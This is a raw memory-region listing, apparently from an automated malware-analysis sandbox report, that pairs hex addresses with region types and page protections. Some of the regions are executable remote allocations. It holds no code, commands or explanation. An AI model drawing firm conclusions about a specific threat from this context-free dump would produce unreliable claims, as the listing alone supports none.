trusted library allocation
page read and write
4C85000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
8186000
heap
page read and write
1B9F840F000
trusted library allocation
page read and write
838C000
stack
page read and write
3344000
heap
page read and write
3401000
heap
page read and write
2A868F20000
heap
page read and write
57D0000
trusted library allocation
page read and write
1B9F8421000
trusted library allocation
page read and write
3401000
heap
page read and write
4C5C000
heap
page read and write
20B5C7B1000
trusted library allocation
page read and write
2F6A000
heap
page read and write
3687000
heap
page read and write
9F4000
heap
page read and write
3401000
heap
page read and write
3639000
heap
page read and write
5CE0000
heap
page read and write
546D000
stack
page read and write
770000
heap
page read and write
BAA000
heap
page read and write
23F99000
heap
page read and write
4820000
trusted library allocation
page execute and read and write
7FFD9B5E4000
trusted library allocation
page read and write
3401000
heap
page read and write
80B0000
trusted library allocation
page execute and read and write
2A868FA4000
heap
page read and write
7660000
trusted library allocation
page read and write
478D000
stack
page read and write
8181000
heap
page read and write
2176D000
stack
page read and write
2B90000
unkown
page execute and read and write
4465000
trusted library allocation
page execute and read and write
431E000
stack
page read and write
23F74000
heap
page read and write
85B0000
direct allocation
page read and write
2730000
heap
page read and write
2D7E000
stack
page read and write
74D1000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3254000
heap
page read and write
2171F000
stack
page read and write
211000
unkown
page execute read
23C0E000
stack
page read and write
DF0000
heap
page read and write
2B40000
heap
page read and write
4971000
trusted library allocation
page read and write
4AF0000
heap
page read and write
2B40000
heap
page read and write
23970000
remote allocation
page read and write
45DD000
trusted library allocation
page execute and read and write
4975000
trusted library allocation
page read and write
6C9E000
stack
page read and write
58C9000
trusted library allocation
page read and write
8491000
heap
page read and write
3401000
heap
page read and write
4CF6000
trusted library allocation
page read and write
4FD5000
trusted library allocation
page read and write
4C24000
heap
page read and write
757E000
stack
page read and write
7440000
trusted library allocation
page read and write
364E000
heap
page read and write
309C000
heap
page read and write
6E8D000
stack
page read and write
2BDF000
stack
page read and write
3401000
heap
page read and write
8C0000
heap
page read and write
4C4D000
heap
page read and write
12A1000
unkown
page readonly
3401000
heap
page read and write
2D12DF6000
stack
page read and write
8130000
direct allocation
page read and write
3876000
unkown
page read and write
33F4000
heap
page read and write
2F7E000
stack
page read and write
73F7000
heap
page read and write
20B74966000
heap
page read and write
3280000
remote allocation
page execute and read and write
55E9000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
3401000
heap
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
2EF9000
trusted library allocation
page read and write
7FFD9B5E0000
trusted library allocation
page read and write
7F60000
trusted library allocation
page read and write
23F3A000
heap
page read and write
23B8E000
stack
page read and write
2B07000
stack
page read and write
2A869190000
heap
page read and write
2FE0000
heap
page read and write
20B5CE15000
trusted library allocation
page read and write
47DC000
stack
page read and write
20B5E5BB000
trusted library allocation
page read and write
8181000
heap
page read and write
8A0000
heap
page read and write
D30000
unkown
page readonly
34DE000
heap
page read and write
3401000
heap
page read and write
20B5E5C9000
trusted library allocation
page read and write
2D1430E000
stack
page read and write
9DA000
stack
page read and write
80F0000
direct allocation
page read and write
2EE3000
trusted library allocation
page execute and read and write
771000
heap
page read and write
23FB1000
heap
page read and write
4795000
heap
page execute and read and write
2AF0000
heap
page read and write
21C44000
heap
page read and write
20B748FA000
heap
page read and write
2411C000
heap
page read and write
74B0000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
3401000
heap
page read and write
20B5C280000
trusted library allocation
page read and write
2C68000
heap
page read and write
2E9E000
unkown
page read and write
23EA1000
heap
page read and write
2B70000
heap
page read and write
344E000
stack
page read and write
4410000
trusted library section
page read and write
364A000
heap
page read and write
364A000
heap
page read and write
8590000
trusted library allocation
page read and write
5D70000
direct allocation
page read and write
21DEE000
direct allocation
page execute and read and write
365E000
heap
page read and write
5971000
trusted library allocation
page read and write
DC0000
unkown
page read and write
8172000
heap
page read and write
2ED0000
trusted library allocation
page read and write
4DBD000
trusted library allocation
page read and write
23F41000
heap
page read and write
5F9A000
heap
page read and write
766E000
stack
page read and write
AD62000
direct allocation
page execute and read and write
20B6C7D1000
trusted library allocation
page read and write
35A0000
heap
page read and write
45FA000
trusted library allocation
page execute and read and write
1B9F68B0000
heap
page read and write
B762000
direct allocation
page execute and read and write
20B5E07F000
trusted library allocation
page read and write
2DFE000
stack
page read and write
3657000
heap
page read and write
65FC000
stack
page read and write
364D000
heap
page read and write
81B5000
heap
page read and write
4EEC000
trusted library allocation
page read and write
1B9F67B1000
system
page execute and read and write
2D1440B000
stack
page read and write
3340000
heap
page read and write
44C0000
heap
page read and write
227000
unkown
page readonly
4880000
heap
page execute and read and write
364E000
heap
page read and write
853E000
stack
page read and write
2FAF000
stack
page read and write
7FFD9B800000
trusted library allocation
page read and write
400000
system
page execute and read and write
7450000
heap
page execute and read and write
2F15000
trusted library allocation
page execute and read and write
80A0000
heap
page read and write
34DF000
stack
page read and write
7510000
trusted library allocation
page read and write
85F0000
direct allocation
page read and write
3401000
heap
page read and write
3639000
heap
page read and write
5C6F000
stack
page read and write
10C0000
unkown
page readonly
13A4000
system
page execute and read and write
358F000
heap
page read and write
4C59000
heap
page read and write
400000
system
page execute and read and write
2FBF000
unkown
page read and write
2CEF000
heap
page read and write
725F000
heap
page read and write
74CB000
heap
page read and write
8EB0000
direct allocation
page execute and read and write
37AA000
heap
page read and write
36CA000
heap
page read and write
2990000
heap
page read and write
7EF7000
stack
page read and write
48A0000
heap
page read and write
20B5CEDD000
trusted library allocation
page read and write
4A4C000
unclassified section
page read and write
20B5C83C000
trusted library allocation
page read and write
27E0000
heap
page read and write
33F4000
heap
page read and write
41E2000
unkown
page read and write
821E000
stack
page read and write
4AF1000
heap
page read and write
3401000
heap
page read and write
246B0000
heap
page read and write
590000
heap
page read and write
8140000
direct allocation
page read and write
3658000
heap
page read and write
3401000
heap
page read and write
6D6E000
stack
page read and write
23A4C000
stack
page read and write
215FC000
stack
page read and write
3648000
heap
page read and write
83CE000
stack
page read and write
2D131FE000
stack
page read and write
7F50000
trusted library allocation
page execute and read and write
6DA0000
direct allocation
page read and write
236EE000
stack
page read and write
20B5CFE7000
trusted library allocation
page read and write
3240000
direct allocation
page read and write
950000
unkown
page readonly
20B5AA8A000
heap
page read and write
81C0000
direct allocation
page read and write
82F000
heap
page read and write
3641000
heap
page read and write
3657000
heap
page read and write
3596000
heap
page read and write
7FFD9B8C0000
trusted library allocation
page read and write
3401000
heap
page read and write
54E0000
trusted library allocation
page read and write
780000
heap
page read and write
4570000
heap
page read and write
3344000
heap
page read and write
81D6000
heap
page read and write
3401000
heap
page read and write
1420000
unkown
page read and write
1B9F68E0000
heap
page read and write
3401000
heap
page read and write
23F18000
heap
page read and write
2D21000
heap
page read and write
3640000
heap
page read and write
2388F000
stack
page read and write
2B9E000
heap
page read and write
20B74A00000
heap
page read and write
3401000
heap
page read and write
21FA0000
unclassified section
page execute and read and write
5F7C000
heap
page read and write
39EE000
stack
page read and write
365D000
heap
page read and write
960000
unkown
page readonly
3639000
heap
page read and write
5F90000
heap
page read and write
582C000
stack
page read and write
359A000
heap
page read and write
849E000
stack
page read and write
8E83000
direct allocation
page execute and read and write
20B5C300000
heap
page read and write
3330000
heap
page read and write
30A0000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
4D1E000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
3630000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
80C0000
trusted library allocation
page read and write
7F090000
trusted library allocation
page execute and read and write
2D3E000
stack
page read and write
3631000
heap
page read and write
4D2D000
trusted library allocation
page read and write
48BA000
unclassified section
page read and write
2EE8000
stack
page read and write
2D1327E000
stack
page read and write
3254000
heap
page read and write
4C5E000
heap
page read and write
5E40000
direct allocation
page read and write
8181000
heap
page read and write
3254000
heap
page read and write
20B5E5A4000
trusted library allocation
page read and write
BCC000
heap
page read and write
5DD0000
heap
page read and write
5E80000
direct allocation
page read and write
8170000
trusted library allocation
page execute and read and write
2EE4000
trusted library allocation
page read and write
8181000
heap
page read and write
35A2000
heap
page read and write
7FFD9B6A0000
trusted library allocation
page execute and read and write
576E000
stack
page read and write
3719000
heap
page read and write
20B5A940000
heap
page read and write
1290000
unkown
page read and write
4C9D000
heap
page read and write
48A1000
trusted library allocation
page read and write
3401000
heap
page read and write
3D42000
unclassified section
page read and write
3654000
heap
page read and write
4968000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
23B0F000
stack
page read and write
6C40000
direct allocation
page read and write
8630000
trusted library allocation
page execute and read and write
2DD0000
heap
page read and write
27BD000
stack
page read and write
86EE000
stack
page read and write
45F0000
trusted library allocation
page read and write
45C000
system
page execute and read and write
3401000
heap
page read and write
7252000
remote allocation
page execute and read and write
1B9F840D000
trusted library allocation
page read and write
3401000
heap
page read and write
75BE000
stack
page read and write
1B9F67B5000
system
page execute and read and write
3230000
heap
page readonly
8097000
stack
page read and write
3401000
heap
page read and write
3255000
heap
page read and write
57D0000
trusted library allocation
page read and write
3401000
heap
page read and write
7590000
trusted library allocation
page read and write
80B0000
heap
page read and write
2F4C000
stack
page read and write
4C9A000
heap
page read and write
7520000
trusted library allocation
page read and write
3401000
heap
page read and write
29E0000
heap
page read and write
24696000
unclassified section
page execute and read and write
2BDE000
heap
page read and write
2B44000
heap
page read and write
1940000
unkown
page readonly
14B0000
heap
page read and write
73BE000
stack
page read and write
460000
heap
page read and write
20B5AA8C000
heap
page read and write
74F0000
trusted library allocation
page read and write
73E000
stack
page read and write
3401000
heap
page read and write
4718000
trusted library allocation
page read and write
5E10000
direct allocation
page read and write
5F82000
heap
page read and write
2CFD000
stack
page read and write
4DDA000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
DA0000
unkown
page read and write
DE0000
unkown
page readonly
20B5C2B0000
trusted library allocation
page read and write
459000
system
page execute and read and write
7FFD9B7E0000
trusted library allocation
page read and write
8280000
trusted library allocation
page execute and read and write
5999000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
9FA000
heap
page read and write
1B9F6760000
system
page execute and read and write
8580000
trusted library allocation
page read and write
4FBF000
stack
page read and write
359A000
heap
page read and write
1B9F68DC000
heap
page read and write
3595000
heap
page read and write
8F62000
direct allocation
page execute and read and write
29E0000
heap
page read and write
2F2F000
stack
page read and write
7EE20000
trusted library allocation
page execute and read and write
4C80000
heap
page read and write
3401000
heap
page read and write
759A000
trusted library allocation
page read and write
50DA000
trusted library allocation
page read and write
23F25000
heap
page read and write
8790000
direct allocation
page read and write
3657000
heap
page read and write
74F3000
heap
page read and write
4D97000
trusted library allocation
page read and write
74EC000
heap
page read and write
210000
unkown
page readonly
5452000
remote allocation
page execute and read and write
3401000
heap
page read and write
81A4000
heap
page read and write
4C76000
heap
page read and write
3401000
heap
page read and write
836000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page read and write
732F000
stack
page read and write
23F41000
heap
page read and write
21330000
heap
page read and write
7680000
trusted library allocation
page read and write
2FB0000
heap
page readonly
4BF0000
heap
page read and write
2EFC000
stack
page read and write
21690000
direct allocation
page read and write
A362000
direct allocation
page execute and read and write
24240000
heap
page read and write
4CB9000
heap
page read and write
3401000
heap
page read and write
20B5E604000
trusted library allocation
page read and write
829E000
heap
page read and write
7580000
trusted library allocation
page read and write
3254000
heap
page read and write
DB1000
unkown
page readonly
3631000
heap
page read and write
3401000
heap
page read and write
3254000
heap
page read and write
3401000
heap
page read and write
246C0000
heap
page read and write
23970000
remote allocation
page read and write
1B9F68E3000
heap
page read and write
3630000
heap
page read and write
8190000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page execute and read and write
4CF4000
trusted library allocation
page read and write
1460000
unkown
page readonly
5302000
heap
page read and write
5F69000
heap
page read and write
3401000
heap
page read and write
80C0000
heap
page readonly
225000
unkown
page read and write
6DC0000
direct allocation
page read and write
71C6000
heap
page read and write
837000
heap
page read and write
3D2C000
unkown
page read and write
6A45000
heap
page execute and read and write
8075000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
20B5AA4B000
heap
page read and write
20B5CFCA000
trusted library allocation
page read and write
1326000
system
page execute and read and write
2D13000
heap
page read and write
8467000
heap
page read and write
2129E000
stack
page read and write
365C000
heap
page read and write
6C50000
direct allocation
page read and write
1940000
unkown
page readonly
4AF1000
heap
page read and write
4C1E000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
82AE000
heap
page read and write
BBF000
heap
page read and write
57E000
stack
page read and write
92F000
stack
page read and write
23F3A000
heap
page read and write
6A3E000
stack
page read and write
3401000
heap
page read and write
5CF5000
heap
page read and write
3401000
heap
page read and write
50F2000
trusted library allocation
page read and write
3401000
heap
page read and write
4830000
trusted library allocation
page read and write
1331000
system
page execute and read and write
3050000
heap
page read and write
7310000
trusted library allocation
page read and write
3418000
heap
page read and write
2B98000
heap
page read and write
8970000
trusted library allocation
page read and write
3240000
direct allocation
page read and write
212DE000
stack
page read and write
840C000
stack
page read and write
3344000
heap
page read and write
650000
heap
page read and write
3401000
heap
page read and write
2F60000
heap
page read and write
3200000
direct allocation
page read and write
7650000
trusted library allocation
page read and write
4906000
trusted library allocation
page read and write
4D0F000
trusted library allocation
page read and write
313C000
unkown
page read and write
225000
unkown
page read and write
4AF1000
heap
page read and write
1480000
unkown
page read and write
58A1000
trusted library allocation
page read and write
7F10000
trusted library allocation
page execute and read and write
4BDE000
unclassified section
page read and write
2163C000
stack
page read and write
3580000
heap
page read and write
5EF8000
heap
page read and write
23F89000
heap
page read and write
3255000
heap
page read and write
239AE000
stack
page read and write
6FC000
stack
page read and write
3655000
heap
page read and write
359A000
heap
page read and write
23D86000
direct allocation
page execute and read and write
8190000
direct allocation
page read and write
23F41000
heap
page read and write
53E1000
heap
page read and write
3401000
heap
page read and write
359A000
heap
page read and write
3401000
heap
page read and write
8181000
heap
page read and write
1490000
heap
page read and write
3401000
heap
page read and write
7620000
trusted library allocation
page read and write
2BCD000
stack
page read and write
3621000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
74FB000
trusted library allocation
page read and write
6F98000
heap
page read and write
3240000
direct allocation
page read and write
23F89000
heap
page read and write
7630000
trusted library allocation
page read and write
8190000
trusted library allocation
page execute and read and write
3E5C000
unclassified section
page read and write
296D000
stack
page read and write
3651000
heap
page read and write
4490000
heap
page readonly
3607000
heap
page read and write
536C000
stack
page read and write
365D000
heap
page read and write
3717000
heap
page read and write
6CFD000
heap
page read and write
21E000
unkown
page readonly
4CE7000
trusted library allocation
page read and write
3401000
heap
page read and write
2E20000
heap
page read and write
331E000
stack
page read and write
21BCF000
heap
page read and write
8760000
direct allocation
page read and write
2F96000
stack
page read and write
3344000
heap
page read and write
3401000
heap
page read and write
74C0000
trusted library allocation
page read and write
C2F000
stack
page read and write
3248000
heap
page read and write
3401000
heap
page read and write
3540000
trusted library allocation
page read and write
1328000
system
page execute and read and write
2A868EF0000
heap
page read and write
829A000
heap
page read and write
23F26000
heap
page read and write
1B9F85AD000
trusted library allocation
page read and write
29D0000
heap
page read and write
6ECB000
stack
page read and write
7FFD9B5F0000
trusted library allocation
page read and write
7438000
heap
page read and write
3401000
heap
page read and write
43F0000
heap
page read and write
12D000
stack
page read and write
8215000
trusted library allocation
page read and write
29FF000
stack
page read and write
8262000
heap
page read and write
2F30000
unkown
page readonly
2417A000
heap
page read and write
3401000
heap
page read and write
86A0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
9B0000
heap
page read and write
237D0000
direct allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
45C0000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
20B5AA61000
heap
page read and write
4B0A000
heap
page read and write
363E000
heap
page read and write
49C9000
trusted library allocation
page read and write
3630000
heap
page read and write
23E6D000
unclassified section
page execute and read and write
3401000
heap
page read and write
4050000
unkown
page read and write
31D0000
heap
page read and write
DC0000
unkown
page readonly
3401000
heap
page read and write
3401000
heap
page read and write
20B74908000
heap
page read and write
2E0E000
stack
page read and write
5F84000
heap
page read and write
74E0000
trusted library allocation
page read and write
75EE000
stack
page read and write
3255000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
3401000
heap
page read and write
2FF0000
heap
page read and write
20B6C7B1000
trusted library allocation
page read and write
3649000
heap
page read and write
87CE000
stack
page read and write
6C10000
direct allocation
page read and write
4C75000
heap
page read and write
74A6000
heap
page read and write
8181000
heap
page read and write
74E4000
trusted library allocation
page read and write
3657000
heap
page read and write
35F3000
heap
page read and write
3401000
heap
page read and write
596000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
23F41000
heap
page read and write
72E0000
trusted library allocation
page read and write
3401000
heap
page read and write
4460000
trusted library allocation
page read and write
21670000
direct allocation
page read and write
522E000
stack
page read and write
20B5A9B5000
heap
page read and write
3401000
heap
page read and write
2469C000
unclassified section
page execute and read and write
2B80000
heap
page read and write
9F4000
heap
page read and write
367B2000
system
page read and write
23F2C000
heap
page read and write
3401000
heap
page read and write
7490000
trusted library allocation
page read and write
20B5AA45000
heap
page read and write
74B0000
trusted library allocation
page read and write
B6C000
heap
page read and write
7204000
heap
page read and write
3401000
heap
page read and write
5F82000
heap
page read and write
5EA0000
heap
page read and write
71FE000
stack
page read and write
7FFD9B920000
trusted library allocation
page read and write
3220000
heap
page read and write
81DC000
stack
page read and write
23F29000
heap
page read and write
82D5000
trusted library allocation
page read and write
663E000
stack
page read and write
6E3E000
stack
page read and write
561E000
stack
page read and write
1B9F8412000
trusted library allocation
page read and write
2EAB000
stack
page read and write
3255000
heap
page read and write
3B19000
direct allocation
page execute and read and write
7FFD9B791000
trusted library allocation
page read and write
6CED000
stack
page read and write
BB7000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
21AA6000
heap
page read and write
23F74000
heap
page read and write
4728000
unclassified section
page read and write
5C5E000
stack
page read and write
3CBD000
direct allocation
page execute and read and write
BCC000
heap
page read and write
8181000
heap
page read and write
4500000
heap
page execute and read and write
3344000
heap
page read and write
702E000
stack
page read and write
706E000
stack
page read and write
5CF7000
heap
page read and write
2AA0000
unkown
page readonly
22FC000
heap
page read and write
3CC1000
direct allocation
page execute and read and write
84E0000
trusted library allocation
page read and write
5C9E000
stack
page read and write
28FF000
unkown
page read and write
8181000
heap
page read and write
3401000
heap
page read and write
8990000
trusted library allocation
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
8410000
heap
page read and write
846B000
heap
page read and write
7FFD9B7D0000
trusted library allocation
page execute and read and write
4420000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
3401000
heap
page read and write
23C8E000
stack
page read and write
4790000
heap
page execute and read and write
3401000
heap
page read and write
2157E000
stack
page read and write
4C75000
heap
page read and write
3401000
heap
page read and write
8181000
heap
page read and write
363C000
heap
page read and write
23ACE000
stack
page read and write
23D5B000
unclassified section
page execute and read and write
3401000
heap
page read and write
3595000
heap
page read and write
33DE000
stack
page read and write
1B9F85C4000
trusted library allocation
page read and write
6C1E000
stack
page read and write
7470000
trusted library allocation
page read and write
3401000
heap
page read and write
3590000
unkown
page execute and read and write
3668000
heap
page read and write
3401000
heap
page read and write
1494000
heap
page read and write
7A8000
heap
page read and write
2870000
heap
page read and write
365D000
heap
page read and write
3401000
heap
page read and write
3647000
heap
page read and write
454E000
stack
page read and write
3254000
heap
page read and write
74D0000
trusted library allocation
page read and write
45C1000
trusted library allocation
page read and write
2182C000
stack
page read and write
23F41000
heap
page read and write
3401000
heap
page read and write
6C5E000
stack
page read and write
3401000
heap
page read and write
884E000
stack
page read and write
4C6E000
heap
page read and write
21F21000
direct allocation
page execute and read and write
8320000
heap
page read and write
24640000
unclassified section
page execute and read and write
2D1337E000
stack
page read and write
225000
unkown
page read and write
7C8000
stack
page read and write
4698000
heap
page read and write
7700000
trusted library allocation
page read and write
3401000
heap
page read and write
6C20000
direct allocation
page read and write
4600000
trusted library allocation
page read and write
23FB1000
heap
page read and write
2A868FC0000
heap
page read and write
2D1383E000
stack
page read and write
76A0000
trusted library allocation
page read and write
4D70000
unclassified section
page read and write
BCC000
heap
page read and write
450000
heap
page read and write
3401000
heap
page read and write
3651000
heap
page read and write
2F30000
unkown
page readonly
2CB1000
heap
page read and write
3591000
heap
page read and write
2D1307E000
stack
page read and write
4C7E000
heap
page read and write
365B000
heap
page read and write
12B0000
unkown
page read and write
3401000
heap
page read and write
7397000
heap
page read and write
3401000
heap
page read and write
5E60000
direct allocation
page read and write
12B0000
unkown
page read and write
57D0000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page execute and read and write
3401000
heap
page read and write
34E8000
heap
page read and write
2FC0000
heap
page readonly
CFC000
stack
page read and write
4960000
heap
page read and write
3401000
heap
page read and write
4596000
unclassified section
page read and write
36DB4000
system
page read and write
23F1A000
heap
page read and write
4670000
heap
page readonly
3401000
heap
page read and write
51A1000
heap
page read and write
360F000
stack
page read and write
5E50000
direct allocation
page read and write
4B21000
heap
page read and write
1190000
unkown
page readonly
2FFE000
stack
page read and write
7670000
trusted library allocation
page read and write
3B9A000
unkown
page read and write
7FFD9B840000
trusted library allocation
page read and write
3611000
heap
page read and write
2B0A000
heap
page read and write
3344000
heap
page read and write
9883000
direct allocation
page execute and read and write
8980000
trusted library allocation
page execute and read and write
3631000
heap
page read and write
8CC0000
direct allocation
page execute and read and write
3401000
heap
page read and write
23F2C000
heap
page read and write
49EF000
stack
page read and write
363C000
heap
page read and write
3401000
heap
page read and write
BBF000
heap
page read and write
7420000
trusted library allocation
page read and write
3240000
heap
page read and write
45D000
system
page execute and read and write
134D000
system
page execute and read and write
DE0000
unkown
page readonly
241B1000
heap
page read and write
6E60000
trusted library allocation
page read and write
3401000
heap
page read and write
7428000
trusted library allocation
page read and write
23D71000
direct allocation
page execute and read and write
2A00000
heap
page read and write
3254000
heap
page read and write
33F0000
heap
page read and write
55DF000
stack
page read and write
7FFD9B880000
trusted library allocation
page read and write
57E0000
trusted library allocation
page read and write
3401000
heap
page read and write
23F1A000
heap
page read and write
BA5000
heap
page read and write
1B9F85CE000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
4C51000
heap
page read and write
3401000
heap
page read and write
365D000
heap
page read and write
5E00000
direct allocation
page read and write
3401000
heap
page read and write
7CD000
stack
page read and write
7298000
trusted library allocation
page read and write
2CF8000
heap
page read and write
36E4000
unkown
page read and write
23F89000
heap
page read and write
73EB000
heap
page read and write
76B0000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
6B0000
heap
page read and write
4E6E000
stack
page read and write
3022000
unkown
page read and write
3401000
heap
page read and write
8230000
trusted library allocation
page execute and read and write
6D90000
direct allocation
page read and write
533E000
stack
page read and write
3401000
heap
page read and write
8780000
direct allocation
page read and write
2AFE000
stack
page read and write
53E2000
heap
page read and write
848E000
stack
page read and write
34EE000
heap
page read and write
9F8000
heap
page read and write
2F60000
heap
page read and write
2C00000
heap
page read and write
3344000
heap
page read and write
DF8000
heap
page read and write
4D93000
trusted library allocation
page read and write
3254000
heap
page read and write
4C5C000
heap
page read and write
35F0000
heap
page read and write
365C000
heap
page read and write
336E000
stack
page read and write
3254000
heap
page read and write
20B5DA03000
trusted library allocation
page read and write
2384E000
stack
page read and write
3344000
heap
page read and write
23F44000
heap
page read and write
53E1000
heap
page read and write
49FA000
trusted library allocation
page read and write
4AF1000
heap
page read and write
3401000
heap
page read and write
1B9F8180000
trusted library allocation
page read and write
4CAF000
heap
page read and write
34EF000
heap
page read and write
12C5000
heap
page read and write
20B5C460000
heap
page read and write
2FD4000
heap
page read and write
5F84000
heap
page read and write
B4C000
heap
page read and write
4C4F000
heap
page read and write
466E000
stack
page read and write
3401000
heap
page read and write
240A3000
heap
page read and write
3401000
heap
page read and write
1490000
heap
page read and write
333D000
heap
page read and write
6D2E000
stack
page read and write
3651000
heap
page read and write
3628000
heap
page read and write
3FBF000
unkown
page execute and read and write
4605000
trusted library allocation
page execute and read and write
15B0000
unkown
page readonly
6DAF000
stack
page read and write
2E20000
heap
page read and write
12C0000
heap
page read and write
359A000
heap
page read and write
363E000
heap
page read and write
74D0000
trusted library allocation
page read and write
B69000
heap
page read and write
2372F000
stack
page read and write
10C0000
unkown
page readonly
3637000
heap
page read and write
3647000
heap
page read and write
20B74904000
heap
page read and write
813D000
stack
page read and write
6A8F000
stack
page read and write
23F41000
heap
page read and write
35F3000
heap
page read and write
20B5C2D0000
trusted library allocation
page read and write
29EC000
heap
page read and write
1B9F68CC000
heap
page read and write
3540000
trusted library allocation
page read and write
2411C000
heap
page read and write
9DA000
stack
page read and write
3250000
heap
page read and write
20B74C4A000
heap
page read and write
3401000
heap
page read and write
3400000
heap
page read and write
3254000
heap
page read and write
348F000
stack
page read and write
3639000
heap
page read and write
8195000
heap
page read and write
2FB4000
stack
page read and write
3254000
heap
page read and write
274E000
stack
page read and write
6DB0000
direct allocation
page read and write
6CDA000
stack
page read and write
20B5E5A9000
trusted library allocation
page read and write
8220000
heap
page read and write
44E0000
trusted library allocation
page read and write
3254000
heap
page read and write
5F86000
heap
page read and write
20B5E5CD000
trusted library allocation
page read and write
6FAE000
stack
page read and write
20B5C465000
heap
page read and write
6BDB000
stack
page read and write
3401000
heap
page read and write
5CF0000
heap
page read and write
3401000
heap
page read and write
6D2D000
stack
page read and write
23800000
direct allocation
page read and write
21F1D000
direct allocation
page execute and read and write
6D80000
direct allocation
page read and write
7460000
trusted library allocation
page read and write
758000
heap
page read and write
7FFD9B7C2000
trusted library allocation
page read and write
DD0000
unkown
page readonly
2DD0000
heap
page read and write
BAA000
heap
page read and write
1B9F8300000
trusted library allocation
page read and write
3410000
heap
page read and write
4430000
trusted library allocation
page read and write
4C9A000
heap
page read and write
20B5CC54000
trusted library allocation
page read and write
3640000
heap
page read and write
8416000
heap
page read and write
4434000
trusted library allocation
page read and write
3401000
heap
page read and write
8280000
trusted library allocation
page read and write
34C0000
heap
page read and write
2C3E000
stack
page read and write
76AD000
stack
page read and write
20B5E7B4000
trusted library allocation
page read and write
20B74B70000
heap
page read and write
87C0000
trusted library allocation
page execute and read and write
8181000
heap
page read and write
4C77000
heap
page read and write
23A8C000
stack
page read and write
D6590FD000
stack
page read and write
DE0000
unkown
page readonly
3780000
heap
page read and write
20B74B8C000
heap
page read and write
20B74C46000
heap
page read and write
3710000
heap
page read and write
3254000
heap
page read and write
22F0000
heap
page read and write
5FE000
stack
page read and write
365B000
heap
page read and write
3390000
heap
page read and write
3254000
heap
page read and write
8EE000
stack
page read and write
8850000
trusted library allocation
page read and write
3401000
heap
page read and write
3200000
direct allocation
page read and write
2B30000
heap
page read and write
2316000
heap
page read and write
D40000
unkown
page readonly
2C8B000
heap
page read and write
11B0000
heap
page read and write
5E20000
direct allocation
page read and write
2F10000
trusted library allocation
page read and write
743D000
stack
page read and write
210000
unkown
page readonly
8120000
direct allocation
page read and write
4C60000
heap
page read and write
29BF000
unkown
page read and write
8181000
heap
page read and write
2D1438D000
stack
page read and write
363C000
heap
page read and write
53BE000
stack
page read and write
74D6000
heap
page read and write
365B000
heap
page read and write
3631000
heap
page read and write
1450000
unkown
page readonly
7FFD9B69C000
trusted library allocation
page execute and read and write
3255000
heap
page read and write
9FA000
heap
page read and write
71BE000
stack
page read and write
3630000
heap
page read and write
938000
heap
page read and write
69FE000
stack
page read and write
73FE000
stack
page read and write
5DC0000
direct allocation
page read and write
857C000
stack
page read and write
6C9E000
stack
page read and write
8220000
trusted library allocation
page read and write
3401000
heap
page read and write
43B000
stack
page read and write
20B5CC43000
trusted library allocation
page read and write
5F99000
heap
page read and write
8181000
heap
page read and write
36AD000
heap
page read and write
20B5C9DC000
trusted library allocation
page read and write
75FD000
stack
page read and write
72EE000
stack
page read and write
487E000
stack
page read and write
215BF000
stack
page read and write
3649000
heap
page read and write
4C70000
heap
page read and write
6D6B000
stack
page read and write
115C000
stack
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3254000
heap
page read and write
81BA000
heap
page read and write
2FDA000
heap
page read and write
20B5AA49000
heap
page read and write
D20000
unkown
page readonly
2414A000
heap
page read and write
3401000
heap
page read and write
8290000
trusted library allocation
page read and write
724D000
heap
page read and write
44D0000
trusted library allocation
page execute and read and write
3255000
heap
page read and write
71B6000
heap
page read and write
4AF7000
heap
page read and write
1DD000
stack
page read and write
2EF0000
trusted library allocation
page read and write
1480000
unkown
page read and write
82A0000
heap
page read and write
33F4000
heap
page read and write
23FE9000
heap
page read and write
365E000
heap
page read and write
7432000
heap
page read and write
23F44000
heap
page read and write
9FA000
heap
page read and write
2FA0000
heap
page read and write
8181000
heap
page read and write
3649000
heap
page read and write
9F6000
heap
page read and write
3401000
heap
page read and write
8181000
heap
page read and write
2B4B000
heap
page read and write
756B000
stack
page read and write
57D0000
trusted library allocation
page read and write
4B0A000
heap
page read and write
2B1F000
stack
page read and write
DA0000
unkown
page read and write
2DBE000
stack
page read and write
8181000
heap
page read and write
233CF000
unclassified section
page execute and read and write
2A868FA5000
heap
page read and write
364F000
heap
page read and write
1B9F82C0000
heap
page read and write
4E3B000
trusted library allocation
page read and write
8080000
trusted library allocation
page read and write
2C40000
heap
page read and write
46E8000
trusted library allocation
page read and write
3651000
heap
page read and write
2FDE000
stack
page read and write
828C000
heap
page read and write
36CA000
heap
page read and write
45B0000
trusted library section
page read and write
73F5000
heap
page read and write
11A0000
unkown
page readonly
6E70000
heap
page execute and read and write
3401000
heap
page read and write
3975000
heap
page read and write
2F30000
heap
page read and write
2874000
heap
page read and write
6E75000
heap
